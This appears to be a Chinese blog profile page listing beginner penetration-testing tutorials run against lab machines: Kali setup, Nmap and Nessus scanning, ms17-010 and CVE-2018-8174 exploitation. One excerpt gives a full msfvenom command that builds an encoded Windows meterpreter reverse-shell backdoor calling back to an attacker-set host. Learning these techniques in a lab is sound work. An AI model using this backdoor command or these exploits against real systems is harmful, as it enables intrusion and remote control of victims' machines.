自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 资源 (2)
  • 收藏
  • 关注

转载 Hoeffding不等式的理解

Hoeffding不等式

2023-02-12 10:46:42 125

转载 交叉熵损失(Cross-entropy)和平方损失(MSE)究竟有何区别?

交叉熵损失(Cross-entropy)和平方损失(MSE)究竟有何区别?

2023-01-28 21:42:03 212

原创 利用0day-java环境-宏感染-安卓客户端进行渗透

一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。CVE-2018-8174 漏洞影响最新版本的 IE 浏览器及使

2022-01-30 17:04:31 5953 5

原创 制作windows和linux客户端恶意软件进行渗透

一、生成Windows后门程序获取shell使用msfvenom制作简易后门程序msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe

2022-01-23 20:23:37 3426

原创 利用msf对靶机metasploitable2和win7进行信息收集

一、基于 tcp 协议收集主机信息1、使用 Metasploit 中的 nmap 和 arp_sweep 收集主机信息Metasploit中也有nmapdb_nmap -sV 192.168.0.103-sV 探测打开的端口以确定服务这里我们可以看到目标开启的服务以及目标的MAC地址和操作系统2、使用arp_sweep模块探查局域网内主机use auxiliary/scanner/discovery/arp_sweep通过“show options”来查看需要设置哪些

2022-01-19 18:17:15 8524

原创 利用ms17-010对win7进行渗透

对Win7进行信息收集并使用metasploit进行渗透

2022-01-17 17:01:01 8858

原创 使用Nmap对靶机进行信息收集以及Nessus的安装并对靶机进行的漏洞扫描

以下是对本地搭建的靶机Metasploitable2-Linux进行的信息收集以及Nessus的安装并对靶机进行的漏洞扫描

2022-01-17 11:02:29 7847

原创 对内网主机进行主动信息收集

一、识别局域网内存活的主机1.利用arping命令检测局域网内是否存在对应主机arping IP地址 -c 1 | grep "bytes from" | cut -d " " -f 5 | cut -d "(" -f 2 | cut -d ")" -f 1若显示对应IP,则局域网内存在该IP2.使用 netdiscover 进行被动方式探测局域中存活的机器netdiscover -i 网卡名 -r 网段3.使用 FPING 查看局域中运行了哪些机器fping -ag .

2021-11-15 20:35:51 568

原创 WireShark抓包及常用协议分析

一、对ARP协议进行抓包分析使用arping命令扫描物理机查看 Address Resolution Protocol (request) ARP 请求包内容二、对ICMP协议进行抓包分析利用ping命令,向虚拟机发送数据包wireshark抓得以下数据三、对TCP协议进行抓包分析通过 Xshell 远程连接 Kali Linux 就会捕获到完整的 TCP3 次握手的链接...

2021-11-15 19:43:53 12079 1

原创 利用第三方服务对目标进行被动信息收集

一、利用漏洞响应平台查看可测试的网站二、被动信息收集1.利用第三方网站进行信息收集站长之家阿里云天眼查利用kali的whois命令使用谷歌搜索技巧,挖掘子域名等信息利用Layer挖掘机,挖掘域名...

2021-10-10 18:32:16 100

原创 搭建ARL资产侦察灯塔系统搭建及使用

1、安装docker环境依赖yum install -y yum-utils device-mapper-persistent-data lvm22、配置国内docker的yum源(阿里云)yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo3、安装epel扩展仓库yum -y install epel-release4、安装 docker-c

2021-10-04 18:48:40 2486

原创 Kali配置固定IP并实现用Xshell连接Kali

1.查看网络配置ifconfig2.临时配置静态IPifconfig eth0 192.168.134.38/243.配置默认路由route add default gw 192.168.134.1此时会报错4.解决该问题 vim /etc/network/interfaces出现以下画面添加以下字符然后重启系统reboot重复以上步骤...

2021-09-28 11:34:03 297

原创 Kali初始配置

1.修改root密码sudo passwd rootps:密码不显示。2.切换root账号su - root --切换至root目录或su root --保持在原目录3.修改国内源vim /etc/apt/sources.list#中科大 Kali 源deb http://mirrors.ustc.edu.cn/kali kali-r

2021-09-25 20:29:09 598

原创 2021-09-25 Kali Linux 安装教程(小白极度友好)

一、安装步骤1.新建虚拟机2.新建虚拟机向导3.选择虚拟机兼容性尽量选最新配置,但没必要选最新,选最新可能导致部分旧版本VM Ware无法打开4.安装光盘映像文件选择.iso文件所在的目录5.选择客户操作虚拟机按下图进行配置如果你的电脑是32位请不要选带“x64位”的版本6.命名虚拟机按照自己的需求进行设置,也可以默认。7.处理器配置处理器的配置不能超过物理机的配置,尽量达到4核。8.虚拟机内存为保证虚拟机...

2021-09-25 18:43:12 1190

原创 2021-08-25 新手创建bt面板并创建网站

文章目录前言 一、bt是什么? 二、安装步骤 1.禁用selinux 2.禁用防火墙 3.前往宝塔主页获取安装方法 一、bt是什么?宝塔Linux面板是提升运维效率的服务器管理软件,支持一键LAMP/LNMP/集群/监控/网站/FTP/数据库/JAVA等100多项服务器管理功能。有30个人的专业团队研发及维护,经过200多个版本的迭代,功能全,少出错且足够安全,已获得全球百万用户认可安装。运维要高效,装宝塔。二、使用步骤1.禁用selinux代码如下(示...

2021-08-25 11:14:10 657

jre-7u17-windows-i586

java安装包

2022-01-30

Nessus(deb包、Windows安装包+插件).zip

有详细教程看我主页

2022-01-17

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除